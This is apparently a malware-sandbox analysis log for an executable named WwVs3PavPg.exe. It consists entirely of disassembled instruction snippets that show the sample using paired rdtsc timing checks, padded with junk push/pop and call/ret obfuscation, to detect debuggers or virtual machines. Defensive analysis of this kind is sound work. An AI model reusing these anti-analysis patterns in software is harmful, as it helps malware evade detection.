Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D132A second address: 9D132E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D15CC second address: 9D15D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D132E second address: 9D1332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D1332 second address: 9D1338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D2A7B second address: 9D2A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D4680 second address: 9D4684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D551F second address: 9D5523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D5523 second address: 9D552D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73F910AA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D552D second address: 9D5593 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73F90B68E8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F73F90B68F4h 0x00000012 nop 0x00000013 jmp 00007F73F90B68EBh 0x00000018 push 00000000h 0x0000001a mov edi, 08F46BB1h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F73F90B68E8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b xchg eax, esi 0x0000003c jng 00007F73F90B6904h 0x00000042 push eax 0x00000043 push edx 0x00000044 push ebx 0x00000045 pop ebx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D65C1 second address: 9D65CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F73F910AA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D65CB second address: 9D65DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D65DC second address: 9D65EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F73F910AA5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D65EB second address: 9D660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jc 00007F73F90B68ECh 0x0000000e push 00000000h 0x00000010 cmc 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1948h], esi 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D660F second address: 9D6628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F73F910AA56h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D873C second address: 9D8753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F73F90B68E6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007F73F90B68E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D8CE2 second address: 9D8CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D6838 second address: 9D683E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D8E9B second address: 9D8E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D8F77 second address: 9D8F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D9FA0 second address: 9D9FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9D9FA4 second address: 9D9FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9DAE2A second address: 9DAE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9DAE2E second address: 9DAE40 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73F90B68E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F73F90B68E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9DBCC1 second address: 9DBD58 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73F910AA5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F73F910AA58h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jmp 00007F73F910AA5Bh 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov edi, 0D52B31Ah 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d or dword ptr [ebp+122D1810h], edi 0x00000043 jmp 00007F73F910AA5Ah 0x00000048 mov eax, dword ptr [ebp+122D0F75h] 0x0000004e add di, 1F0Dh 0x00000053 push FFFFFFFFh 0x00000055 jmp 00007F73F910AA61h 0x0000005a nop 0x0000005b jmp 00007F73F910AA60h 0x00000060 push eax 0x00000061 jbe 00007F73F910AA60h 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9DE1AA second address: 9DE1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E229F second address: 9E230F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F73F910AA56h 0x0000000a popad 0x0000000b pop eax 0x0000000c nop 0x0000000d or ebx, 2B1A34C0h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 or ebx, 1E4176A8h 0x00000027 xor ebx, 062A2C02h 0x0000002d mov eax, dword ptr [ebp+122D01C9h] 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F73F910AA58h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D2C25h] 0x00000053 push FFFFFFFFh 0x00000055 push eax 0x00000056 pushad 0x00000057 pushad 0x00000058 jmp 00007F73F910AA64h 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E40DE second address: 9E40EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E40EF second address: 9E40F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E230F second address: 9E231C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F73F90B68ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E40F3 second address: 9E40F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E5FFA second address: 9E6080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F73F90B68E8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+1247823Ah], ebx 0x0000002c call 00007F73F90B68EDh 0x00000031 jmp 00007F73F90B68F9h 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D38A9h], ebx 0x0000003f mov ebx, 59E246C8h 0x00000044 xchg eax, esi 0x00000045 jnc 00007F73F90B68F7h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jl 00007F73F90B68E8h 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9E52E1 second address: 9E52F6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F73F910AA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9EE95C second address: 9EE965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F4DF5 second address: 9F4E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F4E10 second address: 9F4E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F4EA1 second address: 9F4EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9FA21D second address: 9FA221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 992597 second address: 9925A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F73F910AA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9514 second address: 9F9518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9518 second address: 9F9528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F73F910AA56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9528 second address: 9F955D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F1h 0x00000007 jmp 00007F73F90B68F5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F73F90B68ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F955D second address: 9F9569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F73F910AA58h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9995 second address: 9F9999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9999 second address: 9F999D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9F1C second address: 9F9F2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jno 00007F73F90B68E6h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9F2C second address: 9F9F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F73F910AA56h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9F3F second address: 9F9F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9F43 second address: 9F9F53 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F73F910AA56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9F53 second address: 9F9F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9F9F67 second address: 9F9F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73F910AA5Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007F73F910AA56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A01798 second address: A0179C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0179C second address: A017A6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73F910AA56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A017A6 second address: A017B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F73F90B68EAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A01BB8 second address: A01BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A01E86 second address: A01E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A01FCE second address: A01FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F73F910AA56h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A01FDF second address: A01FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0215E second address: A02162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A022A7 second address: A022AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A022AB second address: A022B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A022B1 second address: A022BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A022BB second address: A022C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A02449 second address: A0244D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0244D second address: A02469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F73F910AA60h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A02469 second address: A02474 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A025C9 second address: A025DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F910AA60h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A025DF second address: A02604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007F73F90B68F6h 0x0000000d jg 00007F73F90B68E6h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A02604 second address: A02610 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F73F910AA5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A02610 second address: A02628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F73F90B68F0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A02628 second address: A0262C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0262C second address: A02630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0278C second address: A02790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A02790 second address: A027A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F73F90B68ECh 0x0000000c jno 00007F73F90B68E6h 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A027A9 second address: A027CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F73F910AA68h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A027CC second address: A027D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F73F90B68E6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A014C1 second address: A014CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A04910 second address: A0491B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0491B second address: A0491F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0A044 second address: A0A053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0A053 second address: A0A057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0A057 second address: A0A05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C97EF second address: 9C9812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73F910AA5Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9812 second address: 9C983C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, esi 0x0000000c lea eax, dword ptr [ebp+124805B8h] 0x00000012 mov ecx, dword ptr [ebp+122D25E2h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C983C second address: 9C9840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9840 second address: 9C9846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9846 second address: 9AFFA4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73F910AA58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, A98Ch 0x00000011 jmp 00007F73F910AA65h 0x00000016 call dword ptr [ebp+122D2E7Eh] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
